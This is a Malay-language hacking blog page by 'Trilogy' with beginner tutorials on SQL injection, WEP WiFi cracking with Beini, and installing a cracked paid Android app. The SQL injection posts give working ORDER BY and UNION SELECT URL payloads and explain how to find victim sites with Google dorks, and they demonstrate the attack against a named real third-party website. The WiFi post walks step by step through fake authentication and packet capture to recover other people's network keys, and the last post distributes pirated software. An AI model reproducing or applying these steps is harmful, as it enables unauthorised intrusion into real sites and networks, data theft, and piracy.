Popular Post

Asas SQLi - Tutorial S3

By : Trilogy


Dalam siri kedua yang lalu kita dah tau bagaimana hendak dapatkan bilangan column yang berada dalam database pada satu-satu laman. Sekarang ni ape yang kita nak buat dengan bilangan column yang kita dapat?

Daripada bilangan column , kita boleh keluarkan maklumat daripadanya. Maklumat column yang mana ‘vulnerable’ untuk di suntik dengan SQL setersnya. Ikuti ringkasan dibawah sebelum kita masuk lebih terperinci.

Keluarkan Data

- Setelah kita mengetahui jumlah column , maka kita perlu mengeluarkan data melalui arahan UNION SELECT
- Contoh laman tadi mempunyai 11 table.

 http://www.contoh.my/index.php?id=1+ORDER+BY+11--

 - Maka , tambahhkan arahan UNION SELECT. Contohnya :

 http://www.contoh.my/index.php?id=1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11--

- Selepas menjalankan arahan diatas , akan muncul no 1 atau 2 dan lain-lain bagi menunjukkan no ajaib yang membolehkan arahan dijalankan keatas no tu pula .

- Contohnya untuk laman ini keluar no 8, 3, 4, 5

Mencari column-column yang boleh ditembusi 
sekarang kita sudah tahu bilangan column dan kita perlukan nombor column yang bertuah untuk dapatkan maklumat darinya.
kita boleh lakukan dengan menambah tanda tolak ( - ) sebelum “ 10 ” dan gantikan " order by # " dengan " union all select " dan nombor column.

Link kita akan kelihatan seperti ini:

kemudian akan terpapar nombor-nombor bertuah yang boleh kita gunakan nanti. 

Laman tersebut akan kelihatan seperti ini :


Pada akhir url,(1,2,3,4,5,6,7,8,9,10,11) kita perlu masukkan nombor column yang kita dapat dari langkah sebelum ini. Kalau dapat 5 letak 1,2,3,4,5, pada akhir url. Sebab laman yang kita cuba pada tutorial ini kita dapat 11 column, jadi kita letak 1,2,3,4,5,6,7,8,9,10,11--
Nombor-nombor ini adalah nombor column yang mana kita boleh dapatkan maklumat darinya. Kita akan ubah suai sedikit pada url dan nombor ini dengan sesuatu pada siri akan datang. Pahamkan dan cuba praktikkan. Siri seterusnya lebih panjang dan agak rumit walaupon ianya tak susah sangat. Mungkin pada pemula, ia perlukan masa untuk paham dan mahir. Jadi pahamkan siri-siri awal ni untuk kita lebih focus nanti. 

Asas SQLi - Tutorial S2

By : Trilogy

Untuk intro, janjang harap korang dapat paham sedikit sebanyak macam mane nak tau laman sesawang itu boleh di suntik atau tidak pada siri 1 yang lepas. Untuk siri dua ini, janjang fokus pula cara macam mana nak cari column yang boleh diceroboh pada database untuk dapatkan maklumat setelah kita tahu yang laman tersebut boleh disuntik.

Kali ini, seperti yang dijanjikan kita boleh try pada live website. Harap takde orang yang akan deface laman ni. Untuk kebaikan bersama.

Janjang tau ramai yang tak sabar, jom kita mulakan siri dua ni... Jeng jeng jeng...

Mendapatkan Data

- Dibahagian ini akan diterangkan secara lalu bagaimana mendapatkan Data melalui query ( suntikan / injection ). Sila pahamkan konsep ini.

- Setelah kita mendapati sesuatu laman mempunyai kelemahan untuk sql injection , anda perlu mendapatkan maklumat jumlah table dan column bagi sesuatu database sebelum data dapat diperolehi daripadanya.

- Dengan menggunakan arahan ORDER BY akan memberikan maklumat tersebut.

- Anda harus meneka jumlah column dengan perhatikan error yang muncul. Jika belum keluar error maka jumlah column masih perlu ditambah, dan kalau keluar error pula sebaliknya.
- Contohnya :
http://www.contoh.my/index.php?id=1+ORDER+BY+1--
http://www.contoh.my/index.php?id=1+ORDER+BY+2--
http://www.contoh.my/index.php?id=1+ORDER+BY+3--
http://www.contoh.my/index.php?id=1+ORDER+BY+4-- <--Ada error
- Jadi , jumlah column ialah 3


OK, itu penerangan secara ringkas mengenai konsep dan apa yang akan dilakukan pada siri kedua ini. Mari kita mulakan penerangan seterusnya secara lanjut macam mana ia dilakukan.

Mencari laman untuk di suntik.

Mencari laman yang mudah terdedah kepada SQLi ini sangat mudah, apa yang kita perlukan hanya lah enjin pencari google. Perkara pertama yang kita perlukan adalah mencari menggunakan dork. Disini janjang kongsi senarai dork yang janjang ada.(korang boleh jugak cari sendiri. Rasanya mana2 pon sama, hanya perlu ubah sedikit. Tak pon kongsi jer dork yang korang ada kat ruang komen)
Download senarai SQLI dork disini : http://www.mediafire.com

(p@ssw0rd = nama blog ni. Takde dot kom)
Ambil salah satu dork, dan letakkan inurl: pada awalan dork (kalau takde pada dork tu) kemudian copy dan paste kedalam google. Selepas enter, pilih salah mane2 laman yang diberi oleh google, kemudian klik padanya sebagai pilihan sasaran.
Sebagai contoh, url pilihan kita akan kelihatan seperti ini:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=10
Untuk memastikan yang laman sasaran kita pilih mudah diserang, apa yang kita perlu buat ialah tambah tanda penyingkat atau apostrophe ( ‘ ) diakhir url.
Jadi, url kita akan kelihatan seperti ini:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=10'
Kemudian tekan enter dan kita akan dapati ia akan mengeluarkan mesej error. Jenis atau mesej error yang keluar tak tentu dan pelbagai.
Laman sasaran akan kelihatan macam ni:
Ini permakna kita dah jumpa laman sasaran yang boleh disuntik. OK lepas tu apa yang perlu kita buat pula ialah untuk dapatkan bilangan column yang ada pada database pada page yang digunakan. Cara yang paling mudah ialah dengan menggunakan perintah ORDER BY diikuti dengan nombor column dan ditambah tanda tolak sebanyak dua kali (--) selepas nombor tadi.
url kita akan kelihatan seperti ini:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 15--
Jika kita dapat mesej error maknenyer kita kena turunkan bilangan nombor column tadi.
Cuba pula 10:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 10--
Laman terbuka secara normal, maknanya column nombor 10 wujud. Jadi, itu bermakna bilangan column adalah diantara 11 dan14.
Sekarang kita cuba 11 pulak:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 11--
Hm.. nampaknya sama juga,laman dibuka secara normal...
Kita cuba pulak 12, harap2 ade mesej error lah, dah panjang sangat pulak nanti tutor ni:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 12--
Aha, kita dapat mesej error. Ini bermakna bilanga column adalah 11. Kenapa? Sebab pada 12 kita dapat mesej error tapi pada 11 ia normal, tiada mesej error. Bermakna column 12 tidak wujud.

Ok, tamat sudah siri 2. Kalau nak diikutkan nak je gabung sekali dengan siri 3 sebab siri 3 ni pendek jer, tapi saja nak bagi korang meleleh air lur jer hehe.

Harap korang dah paham konsep dan cara macam mane nak dapatkan bilangan column ni. Kenapa kita kena dapatkan bilangan column ni? Sebab dari bilangan ini lah kita akan dapat column mana yang mudah di ceroboh, lagi banyak column, lagi panjang kita perlu taip pada url untuk mengetahui column mana yang bertuah untuk diceroboh tu. Nak tau macam mana? Tunggu siri tiga nanti.

Kaedah Hack WiFi Dengan Menggunakan Beini 1.2.2

By : Trilogy
Salam.. Trilogy nak buat tutorial Kaedah Hack WiFi Dengan Menggunakan Beini 1.2.2 ini atas permintaan yang ramai..waahhh..tutorial guna backtrack 4 tak cukup lagi ke? hmm..bagaimanapun tutorial ini dah ada dalam Forum Silent Hackers, jadi Mr.Hac rasa tak perlu nak menaip lagi, Trilogy ambil sahaja dari sana..kredit diberikan kepada encik ayen46 untuk artikel yang mantap ni..




Beini 1.2.1


Klik di sini untuk memuat turun


Beini 1.2.2 (Baru)



Klik di sini untuk memuat turun


Apa yang telah dikemaskini?

- Updated Aircrack-ng to 1.1r1859
- Updated FeedingBottle to 3.2: generate *.wkp file directly when get handshake packets (EWSA3.x project file)
- Added driver x_ath9k_htc_compat-wireless-2.6.38-rc4-1.tce:AR9271 chips supported
- Added firmware.tcz:updated RT3070 firmware and more
- File Manager:Removed ROX-Filer(libglade.tczl,libxml2.tczl,rox-filer_root.tcz,shared-mime-info.tcz),Added Xfe(xfe.tcz,xfe-locale.tcz,fox.tcz,Xorg-7.5-lib.tcz)

Notes: If you are not using AR9271 chips, please delete "x_ath9k_htc_compat-wireless-2.6.38-rc4-1.tce" and "firmware.tcz", these two packets of software will cause some problems with some cards, after that please add "rt2x00_2.6.34-Beini.tce" in Beini-1.2.1 for supporting RT3070 chips. Sorry to have caused you so much inconvenience.


Nota: Burn iso tu as image kat cd (gunakan Nero, Ashampoo, Ultraiso dan lain-lain lagi)
@
Buat USB boot (gunakan UNETbootin 377)



WAJIB BACA DAN DOWNLOAD SETIAP SATU:

Support List

E-Book Tutorial - Cracking WEP Using Feeding Bottle by ayen46[PDF]

Crack WEP / WPA Using Minidwep-gtk in Beini [PDF]:[*credit to www.comfortsurf.com]

Beini USB boot video tutorial versi Melayu

UNETbootin 377 (seperti dalam video)

Run Beini @ VMware Workstation/Player Tutorial

VMware Player 3.1.4

Tutorial cara-cara mengatasi masalah USB tak boleh connect di VMware player by ayen46 [WORD]





HEXwriter- Free ASCII to HEX Converter





Tutorial Crack WEP WiFi Dengan Beini 1.2.2:
(ayat dalam tutorial ni Trilogy copy jadi ia bukan gaya penulisan Trilogy..cuma Trilogy ubah sikit-sikit je la..)


Mula-mula klik ikon ke-5 di bawah(lambang botol susu)



Klik yes


Klik kotak wlan0, lepas tu klik next


Klik scan



Lepas scan, kalau dah dapat pilih wireless mana yang nak hack, klik stop untuk stop scan atau dia akan stop sendiri lepas 30 saat


Klik wireless mana yang nak hack dan dia akan highlight sendiri (Contoh : Deathking). lepas tu klik next


Klik advanced mode


Klik capture, lepas tu klik fake auth (by force)


Klik access to information, klik start. tunggu sampai dia tulis Connected to (macam kat dalam gambar). lepas tu klik X untuk kotak fake authentication with AP (maksudnya tutup kotak tu)


Tick kotak Auto Run. klik Interactive 0841 (-2). tengok kotak kat kiri atas, tengok bahagian Beacons, tunggu sampai 1,000 + lebih. lepas tu klik kotak Previous (All Stop!).


Klik advance mode


Klik capture. klik fake auth (by force)


Klik access to information, klik start. tunggu sampai dia tulis Connected to (macam kat dalam gambar). kali ni tak payah tutup kotak ni.


Klik Interactive 0841 (-2). tengok kotak kat kiri atas, tengok bahagian Data, tunggu sampai 10,000 + lebih. lepas tu klik kotak start crack


Kalau dia keluar failed (gambar sebelah kanan), korang boleh tunggu dia akan run sendiri atau korang boleh klik stop crack, lepas tu klik start crack sekali lagi. saya pilih stop dulu lepas tu start balik


kalau berjaya dia akan tulis key found. angka dalam key found (............) tu la password wifi tu tapi korang kena ambil angka je, yang nie -> : korang abaikan.


P/S: Dalam e-book tu pun dah ada penerangan ni..

Bagaimana Nak Install PAPAGO! M9 Ke Android Mobile

By : Trilogy



Salam semua, Kali nie saya post software tapi lebih kepada tutorial.. Software kali nie bukan untuk pc tau. Ianya untuk user-user smartphone yang menggunakan Operating System Android. 
Kali nie saya nak ajar macam mana nak campakkan apps nie dalam smartphone apabila kita dah habis download dari pc. Apps nie sebenarnya berbayar tetapi korang tak payah risau ianya sudah pun dicrack. Bla-bla-bla... 

Sebelum kita pergi lebih jauh...mari kita tengok spect smartphone yang layak pakai apps nie.



Ok mula-mula sekali korang download apps nie kat sini

Dah abis download?
Ok extract part 1 dan part 2 *Sekarang Full Download (No Part 1 and 2)

- Copyright © Franz Creation - Date A Live - Powered by Blogger - Designed by Johanes Djogan -